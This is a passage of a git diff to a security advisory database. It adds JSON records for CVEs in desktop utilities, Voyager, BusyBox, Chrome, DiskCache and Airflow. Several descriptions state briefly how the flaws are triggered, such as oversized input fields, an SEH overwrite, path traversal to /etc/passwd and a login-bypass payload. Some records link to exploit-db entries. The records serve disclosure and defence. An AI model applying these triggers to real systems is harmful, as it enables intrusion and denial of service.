"https://nvd.nist.gov/vuln/detail/CVE-2024-26478" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc/tree/main/CVE-2024-26478" + }, + { + "type": "WEB", + "url": "https://github.com/statping-ng/statping-ng" + }, + { + "type": "WEB", + "url": "https://statping-ng.github.io" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T20:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v4x7-pcc8-pj6q/GHSA-v4x7-pcc8-pj6q.json b/advisories/unreviewed/2026/02/GHSA-v4x7-pcc8-pj6q/GHSA-v4x7-pcc8-pj6q.json new file mode 100644 index 0000000000000..b044806249268 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v4x7-pcc8-pj6q/GHSA-v4x7-pcc8-pj6q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4x7-pcc8-pj6q", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37179" + ], + "details": "APKF Product Key Finder 2.5.8.0 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the 'Name' input field. Attackers can generate a 1000-character payload and paste it into the registration name field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37179" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47937" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/apkf-product-key-finder-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v7gv-95cv-hv8j/GHSA-v7gv-95cv-hv8j.json b/advisories/unreviewed/2026/02/GHSA-v7gv-95cv-hv8j/GHSA-v7gv-95cv-hv8j.json new file mode 100644 index 0000000000000..ef311d498c8c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v7gv-95cv-hv8j/GHSA-v7gv-95cv-hv8j.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v7gv-95cv-hv8j", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37201" + ], + "details": "NetShareWatcher 1.5.8.0 contains a buffer overflow vulnerability in the registration name input that allows attackers to crash the application. Attackers can generate a 1000-character payload and paste it into the 'Name' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37201" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47848" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/netsharewatcher-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf6g-mr63-q5rh/GHSA-vf6g-mr63-q5rh.json b/advisories/unreviewed/2026/02/GHSA-vf6g-mr63-q5rh/GHSA-vf6g-mr63-q5rh.json new file mode 100644 index 0000000000000..fea243d197093 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf6g-mr63-q5rh/GHSA-vf6g-mr63-q5rh.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf6g-mr63-q5rh", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37198" + ], + "details": "Duplicate Cleaner Pro 4.1.3 contains a denial of service vulnerability that allows attackers to crash the application by injecting an oversized buffer into the license key field. Attackers can generate a 6000-byte payload and paste it into the license activation field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37198" + }, + { + "type": "WEB", + "url": "https://www.digitalvolcano.co.uk/index.html" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47873" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/duplicate-cleaner-pro-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json b/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json index 2eb1982c1af30..12649d210ebcc 100644 --- a/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json +++ b/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vjxh-723c-34mp", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-11T21:30:38Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-48722" ], "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-vr5h-9ppx-x962/GHSA-vr5h-9ppx-x962.json b/advisories/unreviewed/2026/02/GHSA-vr5h-9ppx-x962/GHSA-vr5h-9ppx-x962.json new file mode 100644 index 0000000000000..01a4d4c49f862 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vr5h-9ppx-x962/GHSA-vr5h-9ppx-x962.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vr5h-9ppx-x962", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37183" + ], + "details": "Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 contains a stack overflow vulnerability that allows attackers to execute arbitrary code by overwriting Structured Exception Handler (SEH) registers. Attackers can craft a malicious payload in the License Name input field to trigger a buffer overflow and execute system commands like calc.exe.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37183" + }, + { + "type": "WEB", + "url": "https://www.alloksoft.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47910" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/allok-rm-rmvb-to-avi-mpeg-dvd-converter-stack-overflow-seh" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json b/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json index d0c9cc2713e36..c167ddd1325b3 100644 --- a/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json +++ b/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-w4mj-mj22-jm3c/GHSA-w4mj-mj22-jm3c.json b/advisories/unreviewed/2026/02/GHSA-w4mj-mj22-jm3c/GHSA-w4mj-mj22-jm3c.json index 9e0143968b66c..773e754e75b81 100644 --- a/advisories/unreviewed/2026/02/GHSA-w4mj-mj22-jm3c/GHSA-w4mj-mj22-jm3c.json +++ b/advisories/unreviewed/2026/02/GHSA-w4mj-mj22-jm3c/GHSA-w4mj-mj22-jm3c.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-w5c2-6978-qx5h/GHSA-w5c2-6978-qx5h.json b/advisories/unreviewed/2026/02/GHSA-w5c2-6978-qx5h/GHSA-w5c2-6978-qx5h.json new file mode 100644 index 0000000000000..2cde9118c0c0e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w5c2-6978-qx5h/GHSA-w5c2-6978-qx5h.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5c2-6978-qx5h", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37194" + ], + "details": "Backup Key Recovery 2.2.5 contains a denial of service vulnerability that allows attackers to crash the application by supplying an overly long registration key. Attackers can generate a 1000-character payload file and paste it into the registration key field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37194" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47864" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/backup-key-recovery-recover-keys-crashed-hard-disk-drive-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w79v-5572-69vq/GHSA-w79v-5572-69vq.json b/advisories/unreviewed/2026/02/GHSA-w79v-5572-69vq/GHSA-w79v-5572-69vq.json new file mode 100644 index 0000000000000..29c4521e2b3de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w79v-5572-69vq/GHSA-w79v-5572-69vq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w79v-5572-69vq", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37214" + ], + "details": "Voyager 1.3.0 contains a directory traversal vulnerability that allows attackers to access sensitive system files by manipulating the asset path parameter. Attackers can exploit the path parameter in /admin/voyager-assets to read arbitrary files like /etc/passwd and .env configuration files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37214" + }, + { + "type": "WEB", + "url": "https://github.com/the-control-group/voyager/releases/tag/v1.2.7" + }, + { + "type": "WEB", + "url": "https://github.com/the-control-group/voyager/releases/tag/v1.3.0" + }, + { + "type": "WEB", + "url": "https://voyager.devdojo.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47875" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/voyager-directory-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8gr-fpp3-xwvp/GHSA-w8gr-fpp3-xwvp.json b/advisories/unreviewed/2026/02/GHSA-w8gr-fpp3-xwvp/GHSA-w8gr-fpp3-xwvp.json index 22f9433f79bd7..e9bd3b063be8e 100644 --- a/advisories/unreviewed/2026/02/GHSA-w8gr-fpp3-xwvp/GHSA-w8gr-fpp3-xwvp.json +++ b/advisories/unreviewed/2026/02/GHSA-w8gr-fpp3-xwvp/GHSA-w8gr-fpp3-xwvp.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json b/advisories/unreviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json new file mode 100644 index 0000000000000..6a0984d954338 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8v5-vhqr-4h9v", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2025-69872" + ], + "details": "DiskCache (python-diskcache) through 5.6.3 uses Python pickle for serialization by default. An attacker with write access to the cache directory can achieve arbitrary code execution when a victim application reads from the cache.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69872" + }, + { + "type": "WEB", + "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69872-DiskCache-Pickle-Deserialization.md" + }, + { + "type": "WEB", + "url": "https://github.com/grantjenks/python-diskcache" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wcfp-f743-hjm5/GHSA-wcfp-f743-hjm5.json b/advisories/unreviewed/2026/02/GHSA-wcfp-f743-hjm5/GHSA-wcfp-f743-hjm5.json new file mode 100644 index 0000000000000..9373d93acfaff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcfp-f743-hjm5/GHSA-wcfp-f743-hjm5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcfp-f743-hjm5", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2026-2315" + ], + "details": "Inappropriate implementation in WebGPU in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2315" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/479242793" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x4w3-c999-4989/GHSA-x4w3-c999-4989.json b/advisories/unreviewed/2026/02/GHSA-x4w3-c999-4989/GHSA-x4w3-c999-4989.json index 47a097c402638..782828929672c 100644 --- a/advisories/unreviewed/2026/02/GHSA-x4w3-c999-4989/GHSA-x4w3-c999-4989.json +++ b/advisories/unreviewed/2026/02/GHSA-x4w3-c999-4989/GHSA-x4w3-c999-4989.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x4w3-c999-4989", - "modified": "2026-02-03T21:31:50Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:50Z", "aliases": [ "CVE-2025-59482" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code via a specially crafted network packet containing a field whose length exceeds the maximum expected value.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-x983-7w29-6j6h/GHSA-x983-7w29-6j6h.json b/advisories/unreviewed/2026/02/GHSA-x983-7w29-6j6h/GHSA-x983-7w29-6j6h.json index 98237662c0c34..5369c94816999 100644 --- a/advisories/unreviewed/2026/02/GHSA-x983-7w29-6j6h/GHSA-x983-7w29-6j6h.json +++ b/advisories/unreviewed/2026/02/GHSA-x983-7w29-6j6h/GHSA-x983-7w29-6j6h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x983-7w29-6j6h", - "modified": "2026-02-02T18:31:32Z", + "modified": "2026-02-11T21:30:30Z", "published": "2026-02-02T18:31:32Z", "aliases": [ "CVE-2025-15395" diff --git a/advisories/unreviewed/2026/02/GHSA-xfxm-p3px-phfr/GHSA-xfxm-p3px-phfr.json b/advisories/unreviewed/2026/02/GHSA-xfxm-p3px-phfr/GHSA-xfxm-p3px-phfr.json new file mode 100644 index 0000000000000..835c138965930 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfxm-p3px-phfr/GHSA-xfxm-p3px-phfr.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfxm-p3px-phfr", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37156" + ], + "details": "BloodX 1.0 contains an authentication bypass vulnerability in login.php that allows attackers to access the dashboard without valid credentials. Attackers can exploit the vulnerability by sending a crafted payload with '=''or' parameters to bypass login authentication and gain unauthorized access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37156" + }, + { + "type": "WEB", + "url": "https://github.com/diveshlunker/BloodX" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47842" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/bloodx-authentication-bypass" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xm63-5pjx-vrhp/GHSA-xm63-5pjx-vrhp.json b/advisories/unreviewed/2026/02/GHSA-xm63-5pjx-vrhp/GHSA-xm63-5pjx-vrhp.json new file mode 100644 index 0000000000000..1b39d8c9de258 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xm63-5pjx-vrhp/GHSA-xm63-5pjx-vrhp.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xm63-5pjx-vrhp", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2026-26157" + ], + "details": "A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft malicious archives that when extracted, and under specific conditions, may write to files outside the intended directory. This can lead to arbitrary file overwrite, potentially enabling code execution through the modification of sensitive system files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26157" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-26157" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439039" + }, + { + "type": "WEB", + "url": "https://git.busybox.net/busybox/commit/archival?id=3fb6b31c716669e12f75a2accd31bb7685b1a1cb" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xmrx-grvp-76w7/GHSA-xmrx-grvp-76w7.json b/advisories/unreviewed/2026/02/GHSA-xmrx-grvp-76w7/GHSA-xmrx-grvp-76w7.json index 2f1544cedb5f8..e123782ab47cf 100644 --- a/advisories/unreviewed/2026/02/GHSA-xmrx-grvp-76w7/GHSA-xmrx-grvp-76w7.json +++ b/advisories/unreviewed/2026/02/GHSA-xmrx-grvp-76w7/GHSA-xmrx-grvp-76w7.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, From ce95b1789cd4f1b416a84a03d44a739cf729120a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 21:41:02 +0000 Subject: [PATCH 019/215] Publish Advisories GHSA-5g2w-9f8g-g5q7 GHSA-pm44-x5x7-24c4 GHSA-5g2w-9f8g-g5q7 GHSA-pm44-x5x7-24c4 --- .../GHSA-5g2w-9f8g-g5q7.json | 69 +++++++++++++++++++ .../GHSA-pm44-x5x7-24c4.json | 65 +++++++++++++++++ .../GHSA-5g2w-9f8g-g5q7.json | 35 ---------- .../GHSA-pm44-x5x7-24c4.json | 35 ---------- 4 files changed, 134 insertions(+), 70 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-5g2w-9f8g-g5q7/GHSA-5g2w-9f8g-g5q7.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-5g2w-9f8g-g5q7/GHSA-5g2w-9f8g-g5q7.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json diff --git a/advisories/github-reviewed/2026/02/GHSA-5g2w-9f8g-g5q7/GHSA-5g2w-9f8g-g5q7.json b/advisories/github-reviewed/2026/02/GHSA-5g2w-9f8g-g5q7/GHSA-5g2w-9f8g-g5q7.json new file mode 100644 index 0000000000000..e2197b5ee3e57 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5g2w-9f8g-g5q7/GHSA-5g2w-9f8g-g5q7.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g2w-9f8g-g5q7", + "modified": "2026-02-11T21:39:40Z", + "published": "2026-02-09T12:30:22Z", + "aliases": [ + "CVE-2026-24098" + ], + "summary": "Apache Airflow UI Exposes DAG Import Errors to Unauthorized Authenticated Users", + "details": "### Impact\n\n**Exposure of Sensitive Information:**\n\nAn information disclosure vulnerability exists in the Apache Airflow UI that allows authenticated users to view `Import Errors` for DAGs they are not authorized to access.\n\nIn affected versions, the **Import Errors** view does not correctly filter errors based on granular DAG permissions. This means a user with access to only `DAG_A` can view import errors generated by `DAG_B`, `DAG_C`, or system-level DAGs. These error logs often contain file paths, code snippets, or stack traces that reveal the internal structure and logic of restricted DAGs.\n\n### Patches\n\nUsers should upgrade to Apache Airflow **3.1.7** or later.\nThis version strictly enforces DAG-level permissions on the Import Errors view.\n\n### Workarounds\n\nThere are no known workarounds other than upgrading.\n\n### Resources\n\n* [CVE-2026-24098](https://nvd.nist.gov/vuln/detail/CVE-2026-24098)\n* [Pull Request #60801](https://github.com/apache/airflow/pull/60801)\n* [Mailing List Announcement](https://lists.apache.org/thread/nx96435v77xdst7ls5lk57kqvqyj095x)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "apache-airflow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24098" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/60801" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/airflow" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/nx96435v77xdst7ls5lk57kqvqyj095x" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/09/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T21:39:40Z", + "nvd_published_at": "2026-02-09T11:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json 